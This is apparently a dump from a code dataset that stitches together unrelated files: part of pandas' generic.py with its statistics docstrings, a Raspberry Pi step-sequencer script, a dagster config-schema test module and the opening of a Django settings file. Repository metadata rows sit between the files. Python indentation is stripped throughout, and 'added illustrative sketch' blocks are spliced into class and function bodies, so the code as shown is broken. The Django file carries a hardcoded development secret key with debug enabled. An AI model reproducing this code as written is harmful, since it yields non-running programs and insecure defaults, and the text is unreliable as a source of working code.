``numpy.ndarray`` method ``ptp``.""",
nanptp)
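# Added illustrative sketch (not part of the original pandas source):
# ptp ("peak to peak") is simply nanmax - nanmin, as nanptp above shows;
# it is registered on Series only in this version.
import numpy as np
import pandas as pd
assert pd.Series([3, np.nan, 7, 5]).ptp() == 4.0   # 7 - 3 with NaN skipped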
@classmethod
def _add_series_or_dataframe_operations(cls):
"""Add the series or dataframe only operations to the cls; evaluate
the doc strings again.
"""
from pandas.core import window as rwindow
@Appender(rwindow.rolling.__doc__)
def rolling(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
axis = self._get_axis_number(axis)
return rwindow.rolling(self, window=window,
min_periods=min_periods,
center=center, win_type=win_type,
on=on, axis=axis, closed=closed)
cls.rolling = rolling
@Appender(rwindow.expanding.__doc__)
def expanding(self, min_periods=1, center=False, axis=0):
axis = self._get_axis_number(axis)
return rwindow.expanding(self, min_periods=min_periods,
center=center, axis=axis)
cls.expanding = expanding
@Appender(rwindow.ewm.__doc__)
def ewm(self, com=None, span=None, halflife=None, alpha=None,
min_periods=0, adjust=True, ignore_na=False,
axis=0):
axis = self._get_axis_number(axis)
return rwindow.ewm(self, com=com, span=span, halflife=halflife,
alpha=alpha, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na, axis=axis)
cls.ewm = ewm
@Appender(_shared_docs['transform'] % _shared_doc_kwargs)
def transform(self, func, *args, **kwargs):
result = self.agg(func, *args, **kwargs)
if is_scalar(result) or len(result) != len(self):
raise ValueError("transforms cannot produce "
"aggregated results")
return result
cls.transform = transform
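# Added illustrative sketch (not part of the original pandas source):
# transform() must return something the same length as the input, so an
# aggregating function such as 'sum' triggers the ValueError above.
import pandas as pd
_t = pd.Series([1, 2, 3])
assert _t.transform(lambda x: x * 2).tolist() == [2, 4, 6]
try:
    _t.transform('sum')
except ValueError:
    pass   # aggregated (scalar) results are rejected by design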
# ----------------------------------------------------------------------
# Misc methods
_shared_docs['valid_index'] = """
Return index for %(position)s non-NA/null value.
Notes
-----
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
Returns
-------
scalar : type of index
"""
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = "{%s}" % ', '.join(["{0} ({1})".format(a, i)
for i, a in enumerate(cls._AXIS_ORDERS)])
name = (cls._constructor_sliced.__name__
if cls._AXIS_LEN > 1 else 'scalar')
name2 = cls.__name__
return axis_descr, name, name2
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : boolean, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s
numeric_only : boolean, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)
%(examples)s"""
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : boolean, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)\n"""
_bool_doc = """
%(desc)s
Parameters
----------
axis : int, default 0
Select the axis which can be 0 for indices and 1 for columns.
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
bool_only : boolean, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)
%(see_also)s
%(examples)s"""
_all_doc = """\
Return whether all elements are True over series or dataframe axis.
Returns True if all elements within a series or along a dataframe
axis are non-zero, not-empty or not-False."""
_all_examples = """\
Examples
--------
Series
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
Dataframes
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Adding axis=1 argument will check if row-wise values all return True.
>>> df.all(axis=1)
0 True
1 False
dtype: bool
"""
_all_see_also = """\
See also
--------
pandas.Series.all : Return True if all elements are True
pandas.DataFrame.any : Return True if one (or more) elements are True
"""
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(outname)s : %(name1)s or %(name2)s\n
%(examples)s
See also
--------
pandas.core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
"""
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
_any_see_also = """\
See Also
--------
pandas.DataFrame.all : Return whether all elements are True.
"""
_any_desc = """\
Return whether any element is True over requested axis.
Unlike :meth:`DataFrame.all`, this performs an *or* operation. If any of the
values along the specified axis is True, this will return True."""
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([True, False]).any()
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
_sum_examples = """\
Examples
--------
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan
"""
_prod_examples = """\
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan
"""
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded:: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(cls, name, name1, name2, axis_descr, desc,
f, examples):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, min_count=_min_count_stub,
examples=examples)
@Appender(_num_doc)
def stat_func(self, axis=None, skipna=None, level=None, numeric_only=None,
min_count=0,
**kwargs):
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna, min_count=min_count)
return self._reduce(f, name, axis=axis, skipna=skipna,
numeric_only=numeric_only, min_count=min_count)
return set_function_name(stat_func, name, cls)
def _make_stat_function(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, min_count='', examples='')
@Appender(_num_doc)
def stat_func(self, axis=None, skipna=None, level=None, numeric_only=None,
**kwargs):
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna)
return self._reduce(f, name, axis=axis, skipna=skipna,
numeric_only=numeric_only)
return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr)
@Appender(_num_ddof_doc)
def stat_func(self, axis=None, skipna=None, level=None, ddof=1,
numeric_only=None, **kwargs):
nv.validate_stat_ddof_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna, ddof=ddof)
return self._reduce(f, name, axis=axis, numeric_only=numeric_only,
skipna=skipna, ddof=ddof)
return set_function_name(stat_func, name, cls)
def _make_cum_function(cls, name, name1, name2, axis_descr, desc,
accum_func, accum_func_name, mask_a, mask_b, examples):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, accum_func_name=accum_func_name,
examples=examples)
@Appender(_cnum_doc)
def cum_func(self, axis=None, skipna=True, *args, **kwargs):
skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
if axis is None:
axis = self._stat_axis_number
else:
axis = self._get_axis_number(axis)
y = com._values_from_object(self).copy()
if (skipna and
issubclass(y.dtype.type, (np.datetime64, np.timedelta64))):
result = accum_func(y, axis)
mask = isna(self)
np.putmask(result, mask, tslib.iNaT)
elif skipna and not issubclass(y.dtype.type, (np.integer, np.bool_)):
mask = isna(self)
np.putmask(y, mask, mask_a)
result = accum_func(y, axis)
np.putmask(result, mask, mask_b)
else:
result = accum_func(y, axis)
d = self._construct_axes_dict()
d['copy'] = False
return self._constructor(result, **d).__finalize__(self)
return set_function_name(cum_func, name, cls)
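# Added illustrative sketch (not part of the original pandas source) of the
# skipna masking trick used above: NaN slots are temporarily overwritten
# with a neutral value (mask_a, e.g. +inf for a running minimum, 0.0 for a
# running sum), the accumulation runs, then the NaNs are restored (mask_b).
import numpy as np
_y = np.array([2.0, np.nan, 1.0])
_mask = np.isnan(_y)
np.putmask(_y, _mask, np.inf)            # neutral element for cummin
_res = np.minimum.accumulate(_y)
np.putmask(_res, _mask, np.nan)          # put the NaNs back afterwards
assert np.allclose(_res, [2.0, np.nan, 1.0], equal_nan=True)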
def _make_logical_function(cls, name, name1, name2, axis_descr, desc, f,
examples, see_also):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, examples=examples, see_also=see_also)
@Appender(_bool_doc)
def logical_func(self, axis=None, bool_only=None, skipna=None, level=None,
**kwargs):
nv.validate_logical_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
if bool_only is not None:
raise NotImplementedError("Option bool_only is not "
"implemented with option level.")
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna)
return self._reduce(f, axis=axis, skipna=skipna,
numeric_only=bool_only, filter_type='bool',
name=name)
return set_function_name(logical_func, name, cls)
# install the indexes
for _name, _indexer in indexing.get_indexers_list():
NDFrame._create_indexer(_name, _indexer)
| 34.528833
| 102
| 0.531664
|
4a0595ecf104c35dd89de5d5f675d93575f6480f
| 7,411
|
py
|
Python
|
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | 11
|
2017-11-01T01:21:37.000Z
|
2021-12-05T15:20:19.000Z
|
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | null | null | null |
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | 1
|
2020-11-05T18:03:08.000Z
|
2020-11-05T18:03:08.000Z
|
"""
This module defines the functionality behind running the 12-step sequencer.
For information regarding the circuit setup please refer to 'pi-thrum-schem'.
@author Andrew Pope
"""
import RPi.GPIO as GPIO
import pygame
import time
class Step:
# Map the GPIO pins to each button
# Note:
# * Buttons 0 - 5, play sound AND are used as part of the step seq
# * Buttons 6 - 11, are for the step seq only
__soundBNTs = [ 4, 18, 17, 27, 22, 23 ]
__stepBNTs = [ 24, 25, 5, 6, 12, 13 ]
__stepChannels = [ 4, 18, 17, 27, 22, 23, 24, 25, 5, 6, 12, 13 ]
__playBNT = 19
__recBNT = 16
__LED = 26
def __init__(self, verbose=False, bpm=120000.0):
"""
Initialise class variables, GPIO, and sound
@param verbose - True for verbose print statements
@param bpm - Beats per minute
"""
# Initialise class variables
self.__verbose = verbose
self.__playSteps = False
self.__recording = False
self.__bpm = bpm
self.__stepTime = 15000.0 / bpm
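# Note (added for clarity): run() compares __stepTime against time.time(),
# so it is measured in seconds; with the default bpm of 120000.0 this gives
# 0.125 s per step.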
self.__stepPatterns = []
self.__samples = []
self.__currSamp = None
# Initialise pattern for each step (i.e. what sounds will play)
for i in range(12):
self.__stepPatterns.append([None])
# Initialise GPIO and sound samples
self.__GPIOInit()
self.__soundInit()
def run(self):
"""
Runs the main program (step-sequencer) when invoked
"""
# Initialise callbacks - which will start multi-threading
self.__initCBs()
step = -1
next_time = time.time()
# Begin main loop - will halt when user supplies CTRL+C
while True:
if self.__playSteps:
if time.time() >= next_time:
step = (step + 1) % 12
self.__playPattern(self.__stepPatterns[step])
next_time += self.__stepTime
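# Added illustrative sketch (not part of the original source) of the
# fixed-step scheduling pattern run() uses: advancing next_time by a
# constant increment keeps the step grid stable even if a tick is handled
# late. Standalone and GPIO-free; step_time and n_steps are made-up values.
import time
def _tick_demo(step_time=0.01, n_steps=5):
    step, next_time, fired = -1, time.time(), []
    while len(fired) < n_steps:              # busy-waits, just like run()
        if time.time() >= next_time:
            step = (step + 1) % 12
            fired.append(step)
            next_time += step_time
    return fired
assert _tick_demo() == [0, 1, 2, 3, 4]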
def cleanup(self):
"""
Cleanup method which should be invoked before program exit
"""
# Destroy pygame objects and de-init GPIO pins
pygame.quit()
GPIO.output(self.__LED, GPIO.LOW)
GPIO.cleanup()
def __playPattern(self, pattern):
"""
Plays a collection of sounds called a 'pattern'
@param pattern - The collection of sounds
"""
for sound in pattern:
if sound != None: sound.play()
def __GPIOInit(self):
"""
Initialises the GPIO pins for the pi
(tested on the Pi3 Model B+)
"""
# Set mode PIN numbering to BCM, and define GPIO pin functions
GPIO.setmode(GPIO.BCM)
# Setup Function for input Pins
inputBNTs = (self.__soundBNTs + self.__stepBNTs)
inputBNTs.append(self.__playBNT)
inputBNTs.append(self.__recBNT)
for b in inputBNTs:
GPIO.setup(b, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Setup Function for output Pins
GPIO.setup(self.__LED, GPIO.OUT)
def __soundInit(self):
"""
Initialises the pygame module and loads the sound samples
"""
# Initialise pygame module
pygame.mixer.pre_init(44100, -16, 12, 512) # TODO: Tweak values?
pygame.init()
# Load sounds from samples folder
self.__samples.append(pygame.mixer.Sound('samples/Blop-01.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Glitch-02.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Vocal-03.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Noise-04.wav'))
self.__samples.append(pygame.mixer.Sound('samples/SFX-05.wav'))
self.__samples.append(pygame.mixer.Sound('samples/Strike-06.wav'))
for sample in self.__samples:
sample.set_volume(.95)
def __initCBs(self):
"""
Initialises the Callback functions for each Input IO pin
"""
# Sound Button Callbacks:
for i in range(6):
bnt = self.__soundBNTs[i]
smp = self.__samples[i]
GPIO.add_event_detect(bnt, GPIO.RISING, callback=lambda x,y=smp:
self.__soundCB(x, y), bouncetime=200)
# Step Button Callbacks:
for bnt in self.__stepBNTs:
GPIO.add_event_detect(bnt, GPIO.RISING, callback=lambda x:
self.__stepCB(x), bouncetime=200)
# Play Button Callback:
GPIO.add_event_detect(self.__playBNT, GPIO.RISING, callback=lambda x:
self.__playCB(x), bouncetime=200)
# Record Button Callback:
GPIO.add_event_detect(self.__recBNT, GPIO.RISING, callback=lambda x:
self.__recCB(x), bouncetime=200)
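# Added illustrative sketch (not part of the original source): the y=smp
# default argument above freezes the sample chosen on each loop iteration.
# A plain closure would late-bind and every callback would see the last
# value, as this GPIO-free demo shows.
_names = ['blop', 'glitch', 'vocal']
_late = [lambda: n for n in _names]
_bound = [lambda n=n: n for n in _names]
assert [f() for f in _late] == ['vocal', 'vocal', 'vocal']
assert [f() for f in _bound] == ['blop', 'glitch', 'vocal']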
def __soundCB(self, channel, sound):
"""
Callback for sound button (a sound button also doubles as a step
button)
@param channel - The GPIO PIN that the signal was sent on
@param sound - The sound to play
"""
step = self.__stepChannels.index(channel)
self.__prtVerb("Sound bnt IO-{0}, Step={1}".format(channel, step))
if self.__recording:
self.__toggleStepSample(step, self.__currSamp)
else:
sound.play()
self.__currSamp = sound
def __stepCB(self, channel):
"""
Callback for step button
@param channel - The GPIO PIN that the signal was sent on
"""
step = self.__stepChannels.index(channel)
self.__prtVerb("Step bnt IO-{0}, Step={1}".format(channel, step))
if self.__recording:
self.__toggleStepSample(step, self.__currSamp)
def __playCB(self, channel):
"""
Callback for play button
@param channel - The GPIO PIN that the signal was sent on
"""
self.__prtVerb("Play bnt IO-{0}".format(channel))
self.__playSteps = not self.__playSteps # Toggle playing
def __recCB(self, channel):
"""
Callback for record button
@param channel - The GPIO PIN that the signal was sent on
"""
self.__prtVerb("Record bnt IO-{0}".format(channel))
GPIO.output(self.__LED, not GPIO.input(self.__LED)) # Toggle LED
self.__recording = not self.__recording # Toggle recording
def __toggleStepSample(self, step, sample):
"""
Will either add or remove a sound sample to/from a step 'pattern'
@param step - The step to check
@param sample - The sample to add or remove
"""
# Determine if the currently selected sample is 'on' the step
# if so - remove it, if not - add it
if sample in self.__stepPatterns[step]:
self.__stepPatterns[step].remove(sample)
else:
self.__stepPatterns[step].append(sample)
def __prtVerb(self, mesg):
"""
Verbose message print method
@param mesg - The message to print
"""
if self.__verbose:
print(mesg)
| 34.152074
| 77
| 0.564431
|
e4ef6414dcddde5a6be75bae30e4ef05b5fb7b72
| 4,724
|
py
|
Python
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 1
|
2021-04-27T19:49:59.000Z
|
2021-04-27T19:49:59.000Z
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | 7
|
2022-03-16T06:55:04.000Z
|
2022-03-18T07:03:25.000Z
|
python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_config_spec.py
|
bitdotioinc/dagster
|
4fe395a37b206b1a48b956fa5dd72bf698104cca
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from dagster import (
DagsterInvalidConfigDefinitionError,
Noneable,
Permissive,
Selector,
execute_solid,
solid,
)
def test_kitchen_sink():
@solid(
config_schema={
"str_field": str,
"int_field": int,
"list_int": [int],
"list_list_int": [[int]],
"dict_field": {"a_string": str},
"list_dict_field": [{"an_int": int}],
"selector_of_things": Selector(
{"select_list_dict_field": [{"an_int": int}], "select_int": int}
),
# this is a good argument to use () instead of [] for type parameterization in
# the config system
"optional_list_of_optional_string": Noneable([Noneable(str)]),
}
)
def kitchen_sink(context):
return context.solid_config
solid_config_one = {
"str_field": "kjf",
"int_field": 2,
"list_int": [3],
"list_list_int": [[1], [2, 3]],
"dict_field": {"a_string": "kdjfkd"},
"list_dict_field": [{"an_int": 2}, {"an_int": 4}],
"selector_of_things": {"select_int": 3},
"optional_list_of_optional_string": ["foo", None],
}
assert (
execute_solid(
kitchen_sink, run_config={"solids": {"kitchen_sink": {"config": solid_config_one}}},
).output_value()
== solid_config_one
)
solid_config_two = {
"str_field": "kjf",
"int_field": 2,
"list_int": [3],
"list_list_int": [[1], [2, 3]],
"dict_field": {"a_string": "kdjfkd"},
"list_dict_field": [{"an_int": 2}, {"an_int": 4}],
"selector_of_things": {"select_list_dict_field": [{"an_int": 5}]},
"optional_list_of_optional_string": None,
}
assert (
execute_solid(
kitchen_sink, run_config={"solids": {"kitchen_sink": {"config": solid_config_two}}},
).output_value()
== solid_config_two
)
def test_builtin_dict():
executed = {}
@solid(config_schema=dict)
def builtin_dict_solid(context):
executed["yup"] = True
return context.solid_config
assert isinstance(builtin_dict_solid.config_schema.config_type, Permissive)
assert execute_solid(
builtin_dict_solid, run_config={"solids": {"builtin_dict_solid": {"config": {"a": "b"}}}}
).output_value() == {"a": "b"}
assert executed["yup"]
def test_bad_solid_config_argument():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema="dkjfkd")
def _bad_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: 'dkjfkd'. 'dkjfkd' cannot be resolved."
)
def test_bad_solid_config_argument_nested():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"field": "kdjkfjd"})
def _bad_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'field': 'kdjkfjd'}. "
"Error at stack path :field. 'kdjkfjd' cannot be resolved."
)
def test_bad_solid_config_argument_list_wrong_length():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_list": []})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_list': []}. "
"Error at stack path :bad_list. [] cannot be resolved. "
"Reason: List must be of length 1."
)
def test_bad_solid_config_argument_list_bad_item():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_list": ["kdjfkd"]})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_list': ['kdjfkd']}. "
"Error at stack path :bad_list. ['kdjfkd'] cannot be resolved. "
"Reason: List have a single item and contain a valid type i.e. [int]. "
"Got item 'kdjfkd'."
)
def test_bad_solid_config_argument_list_bad_nested_item():
with pytest.raises(DagsterInvalidConfigDefinitionError) as exc_info:
@solid(config_schema={"bad_nested_list": [{"bad_field": "kjdkfd"}]})
def _bad_list_config(_):
pass
assert str(exc_info.value).startswith(
"Error defining config. Original value passed: {'bad_nested_list': "
"[{'bad_field': 'kjdkfd'}]}. Error at stack path "
":bad_nested_list:bad_field. 'kjdkfd' cannot be resolved."
)
| 30.477419
| 97
| 0.61431
|
2a3745d9f2873d5bc4c1b6a58658316217195fc7
| 3,122
|
py
|
Python
|
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
app/app/settings.py
|
sarathp2409/receipe-app-api
|
be7245198a25103abfc45daeb3ba022806ee3857
|
[
"MIT"
] | null | null | null |
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'daobq_2yniem#waxqlrd_u1)s5y#1v9-o!+3*1@v=x2ei-3u+c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
